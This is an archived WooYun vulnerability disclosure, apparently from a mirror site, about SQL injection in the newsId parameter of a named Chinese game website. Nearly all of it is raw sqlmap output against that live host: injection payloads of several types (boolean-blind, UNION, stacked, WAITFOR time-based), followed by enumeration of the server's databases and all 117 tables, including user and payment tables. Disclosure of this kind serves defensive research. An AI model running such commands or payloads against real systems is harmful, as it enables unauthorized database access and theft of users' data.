乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-01-09: 细节已通知厂商并且等待厂商处理中 2015-01-14: 厂商已经主动忽略漏洞,细节向公众公开
rt
直接上图:
[root@Hacker~]# Sqlmap Sqlmap -u "http://wan.g.shangdu.com/GameInfo/NewsContent.aspx?newsId=1426" --dbs sqlmap/1.0-dev - automatic SQL injection and database takeover tool http://sqlmap.org[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable loca[*] starting at 17:00:43[17:00:43] [INFO] resuming back-end DBMS 'microsoft sql server'[17:00:44] [INFO] testing connection to the target URLsqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Place: GETParameter: newsId Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: newsId=1426 AND 4436=4436 Type: UNION query Title: Generic UNION query (NULL) - 18 columns Payload: newsId=-3502 UNION ALL SELECT 68,CHAR(113)+CHAR(110)+CHAR(101)+CHAR(113)+CHAR(113)+CHAR(76)+CHAR(112)+CHAR(103)+CHAR(110)+CHAR(79)+CHAR(85)+CHAR(121)+C Type: stacked queries Title: Microsoft SQL Server/Sybase stacked queries Payload: newsId=1426; WAITFOR DELAY '0:0:5'-- Type: AND/OR time-based blind Title: Microsoft SQL Server/Sybase time-based blind Payload: newsId=1426 WAITFOR DELAY '0:0:5'-----[17:00:44] [INFO] the back-end DBMS is Microsoft SQL Serverweb server operating system: Windowsweb application technology: ASP.NET, ASP.NET 4.0.30319back-end DBMS: Microsoft SQL Server 2008[17:00:44] [INFO] fetching database names[17:00:44] [INFO] the SQL query used returns 5 entries[17:00:44] [INFO] resumed: "master"[17:00:44] [INFO] resumed: "model"[17:00:44] [INFO] resumed: "msdb"[17:00:44] [INFO] resumed: "ShangDuWebGame"[17:00:44] [INFO] resumed: "tempdb"available databases [5]:[*] master[*] model[*] msdb[*] ShangDuWebGame[*] tempdb[17:00:44] [WARNING] cannot properly display Unicode characters inside Windows OS command prompt (http://bugs.python.org/issue1602). All unhandled occurances will r[17:00:44] [INFO] fetched data logged to text files under 'E:\360?~1\SQLMAP~1.4\Bin\output\wan.g.shangdu.com'[*] shutting down at 17:00:44[root@Hacker~]# Sqlmap Sqlmap -u "http://wan.g.shangdu.com/GameInfo/NewsContent.aspx?newsId=1426" -D ShangDuWebGame --tables --thread 10 sqlmap/1.0-dev - automatic SQL injection and database takeover tool http://sqlmap.org[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable loca[*] starting at 17:11:42[17:11:42] [INFO] resuming back-end DBMS 'microsoft sql server'[17:11:42] [INFO] testing connection to the target URLsqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Place: GETParameter: newsId Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: newsId=1426 AND 4436=4436 Type: UNION query Title: Generic UNION query (NULL) - 18 columns Payload: newsId=-3502 UNION ALL SELECT 68,CHAR(113)+CHAR(110)+CHAR(101)+CHAR(113)+CHAR(113)+CHAR(76)+CHAR(112)+CHAR(103)+CHAR(110)+CHAR(79)+CHAR(85)+CHAR(121)+C Type: stacked queries Title: Microsoft SQL Server/Sybase stacked queries Payload: newsId=1426; WAITFOR DELAY '0:0:5'-- Type: AND/OR time-based blind Title: Microsoft SQL Server/Sybase time-based blind Payload: newsId=1426 WAITFOR DELAY '0:0:5'-----[17:11:42] [INFO] the back-end DBMS is Microsoft SQL Serverweb server operating system: Windowsweb application technology: ASP.NET, ASP.NET 4.0.30319back-end DBMS: Microsoft SQL Server 2008[17:11:42] [INFO] fetching tables for database: ShangDuWebGame[17:11:43] [WARNING] reflective value(s) found and filtering out[17:11:43] [INFO] the SQL query used returns 117 entries[17:11:43] [INFO] starting 10 threads[17:11:43] [INFO] retrieved: "dbo.ActiveConfig"[17:11:44] [INFO] retrieved: "dbo.CreditsRule"[17:11:44] [INFO] retrieved: "dbo.Area"[17:11:44] [INFO] retrieved: "dbo.DataGroups"[17:11:44] [INFO] retrieved: "dbo.AspNet_SqlCacheTablesForChangeNotification"[17:11:44] [INFO] retrieved: "dbo.AccountRepair"[17:11:45] [INFO] retrieved: "dbo.FeedBack"[17:11:45] [INFO] retrieved: "dbo.CPL_Config"[17:11:45] [INFO] retrieved: "dbo.City"[17:11:45] [INFO] retrieved: "dbo.BasicDataGroups"[17:11:45] [INFO] retrieved: "dbo.GameCard"[17:11:45] [INFO] retrieved: "dbo.EmailTemplate"[17:11:45] [INFO] retrieved: "dbo.Activities"[17:11:46] [INFO] retrieved: "dbo.GameExtend"[17:11:46] [INFO] retrieved: "dbo.GameCardType"[17:11:46] [INFO] retrieved: "dbo.GameDataSorts"[17:11:46] [INFO] retrieved: "dbo.GameMatter"[17:11:46] [INFO] retrieved: "dbo.GameServers"[17:11:46] [INFO] retrieved: "dbo.GameData"[17:11:46] [INFO] retrieved: "dbo.AwardsLog"[17:11:46] [INFO] retrieved: "dbo.GameServers"[17:11:46] [INFO] retrieved: "dbo.GameTask"[17:11:47] [INFO] retrieved: "dbo.GameFlags"[17:11:47] [INFO] retrieved: "dbo.FriendSiteList"[17:11:47] [INFO] retrieved: "dbo.GoodType"[17:11:47] [INFO] retrieved: "dbo.GuaAwardsLog"[17:11:47] [INFO] retrieved: "dbo.GuaBackImg"[17:11:47] [INFO] retrieved: "dbo.GameImages"[17:11:47] [INFO] retrieved: "dbo.GoodOrders"[17:11:47] [INFO] retrieved: "dbo.BasicDataGroups"[17:11:47] [INFO] retrieved: "dbo.Log_Channel_2478_26_13745"[17:11:47] [INFO] retrieved: "dbo.Log_Channel_2478_26_13745"[17:11:47] [INFO] retrieved: "dbo.Log_Channel_2478_26_13745"[17:11:47] [INFO] retrieved: "dbo.Log_Channel_2478_26_139"[17:11:48] [INFO] retrieved: "dbo.Log_Channel_2478_26_17398"[17:11:48] [INFO] retrieved: "dbo.Log_Channel_2478_26_9892"[17:11:48] [INFO] retrieved: "dbo.Log_Channel_2478_39_32984"[17:11:48] [INFO] retrieved: "dbo.Log_Channel_265g_26_11577"[17:11:48] [INFO] retrieved: "dbo.Log_Channel_265g_26_11577"[17:11:48] [INFO] retrieved: "dbo.GuaAwardsLog"[17:11:48] [INFO] retrieved: "dbo.Log_Channel_265g_26_11577"[17:11:48] [INFO] retrieved: "dbo.Log_Channel_265g_26_138"[17:11:48] [INFO] retrieved: "dbo.Log_Channel_265g_26_20170"[17:11:48] [INFO] retrieved: "dbo.Log_Channel_265g_26_5261"[17:11:48] [INFO] retrieved: "dbo.Log_Channel_265g_39_32982"[17:11:48] [INFO] retrieved: "dbo.Log_Channel_265g_39_32982"[17:11:48] [INFO] retrieved: "dbo.Log_Channel_51kuku_26_17613"[17:11:49] [INFO] retrieved: "dbo.Log_Channel_bengbeng_26_137"[17:11:49] [INFO] retrieved: "dbo.Log_Channel_juxiangyou_26_10308"[17:11:49] [INFO] retrieved: "dbo.Log_Buy"[17:11:49] [INFO] retrieved: "dbo.GameApi"[17:11:49] [INFO] retrieved: "dbo.Log_Channel_bengbeng_26_137"[17:11:49] [INFO] retrieved: "dbo.Log_Channel_juxiangyou_26_20168"[17:11:49] [INFO] retrieved: "dbo.Log_Channel_juxiangyou_26_10308"[17:11:49] [INFO] retrieved: "dbo.Log_Channel_juxiangyou_26_10308"[17:11:49] [INFO] retrieved: "dbo.Log_Channel_juxiangyou_26_13264"[17:11:49] [INFO] retrieved: "dbo.Log_Channel_wanzhuan_26_140"[17:11:49] [INFO] retrieved: "dbo.Log_Channel_juxiangyou_26_17588"[17:11:50] [INFO] retrieved: "dbo.GenerateOrderNo"[17:11:50] [INFO] retrieved: "dbo.Log_CheckIn"[17:11:50] [INFO] retrieved: "dbo.Log_Channel_wanzhuan_26_140"[17:11:50] [INFO] retrieved: "dbo.Log_TempUser"[17:11:50] [INFO] retrieved: "dbo.GamePayLog"[17:11:50] [INFO] retrieved: "dbo.Log_GameCard"[17:11:50] [INFO] retrieved: "dbo.LuckdrawTimes"[17:11:50] [INFO] retrieved: "dbo.Log_Channel_juxiangyou_26_13747"[17:11:51] [INFO] retrieved: "dbo.MobileGame_BasicDataGroups"[17:11:51] [INFO] retrieved: "dbo.Log_Credits"[17:11:51] [INFO] retrieved: "dbo.MobileGame_BasicDataGroups"[17:11:51] [INFO] retrieved: "dbo.MobileGame_CardType"[17:11:51] [INFO] retrieved: "dbo.Log_VipLevel"[17:11:51] [INFO] retrieved: "dbo.MobileGame_ContentLink"[17:11:51] [INFO] retrieved: "dbo.MobileGame_HomeConfig"[17:11:51] [INFO] retrieved: "dbo.MobileGame_AppConfig"[17:11:52] [INFO] retrieved: "dbo.MobileGame_News_Classify"[17:11:52] [INFO] retrieved: "dbo.MobileGame_News_Classify"[17:11:52] [INFO] retrieved: "dbo.MobileGame_News_Link"[17:11:52] [INFO] retrieved: "dbo.MobileGame_News_Material"[17:11:52] [INFO] retrieved: "dbo.MobileGame_Material"[17:11:52] [INFO] retrieved: "dbo.MobileGame_Push"[17:11:52] [INFO] retrieved: "dbo.MobileGame_SearchKeyword"[17:11:52] [INFO] retrieved: "dbo.MobileGame_SearchLog"[17:11:52] [INFO] retrieved: "dbo.MobileGame_UserFavorites"[17:11:52] [INFO] retrieved: "dbo.MobileGame_Activity"[17:11:53] [INFO] retrieved: "dbo.Log_UserLogin"[17:11:53] [INFO] retrieved: "dbo.News"[17:11:53] [INFO] retrieved: "dbo.OneKeyUserBind"[17:11:53] [INFO] retrieved: "dbo.MobileGame_Version"[17:11:53] [INFO] retrieved: "dbo.MobileGame_Config"[17:11:53] [INFO] retrieved: "dbo.PayType"[17:11:53] [INFO] retrieved: "dbo.ObjectGoods"[17:11:53] [INFO] retrieved: "dbo.MobileGame_Card"[17:11:53] [INFO] retrieved: "dbo.PageResource"[17:11:54] [INFO] retrieved: "dbo.SendEmailLog"[17:11:54] [INFO] retrieved: "dbo.Log_Channel_juxiangyou_39_32983"[17:11:54] [INFO] retrieved: "dbo.SinglePages"[17:11:54] [INFO] retrieved: "dbo.SiteConfig"[17:11:54] [INFO] retrieved: "dbo.Log_LoginGame"[17:11:54] [INFO] retrieved: "dbo.SmsLog"[17:11:54] [INFO] retrieved: "dbo.UserGameTask"[17:11:54] [INFO] retrieved: "dbo.PlatformPayLog"[17:11:55] [INFO] retrieved: "dbo.Province"[17:11:55] [INFO] retrieved: "dbo.UserQuestion"[17:11:55] [INFO] retrieved: "dbo.TgUserInfo"[17:11:55] [INFO] retrieved: "dbo.UserInfo"[17:11:55] [INFO] retrieved: "dbo.VIP_CreditsRule"[17:11:55] [INFO] retrieved: "dbo.WebData"[17:11:55] [INFO] retrieved: "dbo.UserGame"[17:11:55] [INFO] retrieved: "dbo.WebMatter_Area"[17:11:55] [INFO] retrieved: "dbo.WebMatterArea"[17:11:56] [INFO] retrieved: "dbo.VipRule"[17:11:56] [INFO] retrieved: "dbo.Users"[17:11:56] [INFO] retrieved: "dbo.PayLog"[17:11:56] [INFO] retrieved: "dbo.YearCardLog"[17:11:56] [INFO] retrieved: "dbo.MobileGames"[17:11:57] [INFO] retrieved: "dbo.UserYearCard"[17:11:57] [INFO] retrieved: "dbo.SeoConfig"Database: ShangDuWebGame[117 tables]+--------------------------------------------+| AccountRepair || ActiveConfig || Activities || Area || AspNet_SqlCacheTablesForChangeNotification || AwardsLog || BasicDataGroups || BasicDataGroups || CPL_Config || City || CreditsRule || DataGroups || EmailTemplate || FeedBack || FriendSiteList || GameApi || GameCard || GameCardType || GameData || GameDataSorts || GameExtend || GameFlags || GameImages || GameMatter || GamePayLog || GameServers || GameServers || GameTask || GenerateOrderNo || GoodOrders || GoodType || GuaAwardsLog || GuaAwardsLog || GuaBackImg || Log_Buy || Log_Channel_2478_26_13745 || Log_Channel_2478_26_13745 || Log_Channel_2478_26_13745 || Log_Channel_2478_26_139 || Log_Channel_2478_26_17398 || Log_Channel_2478_26_9892 || Log_Channel_2478_39_32984 || Log_Channel_265g_26_11577 || Log_Channel_265g_26_11577 || Log_Channel_265g_26_11577 || Log_Channel_265g_26_138 || Log_Channel_265g_26_20170 || Log_Channel_265g_26_5261 || Log_Channel_265g_39_32982 || Log_Channel_265g_39_32982 || Log_Channel_51kuku_26_17613 || Log_Channel_bengbeng_26_137 || Log_Channel_bengbeng_26_137 || Log_Channel_juxiangyou_26_10308 || Log_Channel_juxiangyou_26_10308 || Log_Channel_juxiangyou_26_10308 || Log_Channel_juxiangyou_26_13264 || Log_Channel_juxiangyou_26_13747 || Log_Channel_juxiangyou_26_17588 || Log_Channel_juxiangyou_26_20168 || Log_Channel_juxiangyou_39_32983 || Log_Channel_wanzhuan_26_140 || Log_Channel_wanzhuan_26_140 || Log_CheckIn || Log_Credits || Log_GameCard || Log_LoginGame || Log_TempUser || Log_UserLogin || Log_VipLevel || LuckdrawTimes || MobileGame_Activity || MobileGame_AppConfig || MobileGame_BasicDataGroups || MobileGame_BasicDataGroups || MobileGame_Card || MobileGame_CardType || MobileGame_Config || MobileGame_ContentLink || MobileGame_HomeConfig || MobileGame_Material || MobileGame_News_Classify || MobileGame_News_Classify || MobileGame_News_Link || MobileGame_News_Material || MobileGame_Push || MobileGame_SearchKeyword || MobileGame_SearchLog || MobileGame_UserFavorites || MobileGame_Version || MobileGames || News || ObjectGoods || OneKeyUserBind || PageResource || PayLog || PayType || PlatformPayLog || Province || SendEmailLog || SeoConfig || SinglePages || SiteConfig || SmsLog || TgUserInfo || UserGame || UserGameTask || UserInfo || UserQuestion || UserYearCard || Users || VIP_CreditsRule || VipRule || WebData || WebMatterArea || WebMatter_Area || YearCardLog |+--------------------------------------------+[17:11:58] [WARNING] cannot properly display Unicode characters inside Windows OS command prompt (http://bugs.python.org/issue1602). All unhandled occurances will r[17:11:58] [INFO] fetched data logged to text files under 'E:\360?~1\SQLMAP~1.4\Bin\output\wan.g.shangdu.com'
null
危害等级:无影响厂商忽略
忽略时间:2015-01-14 21:54
暂无
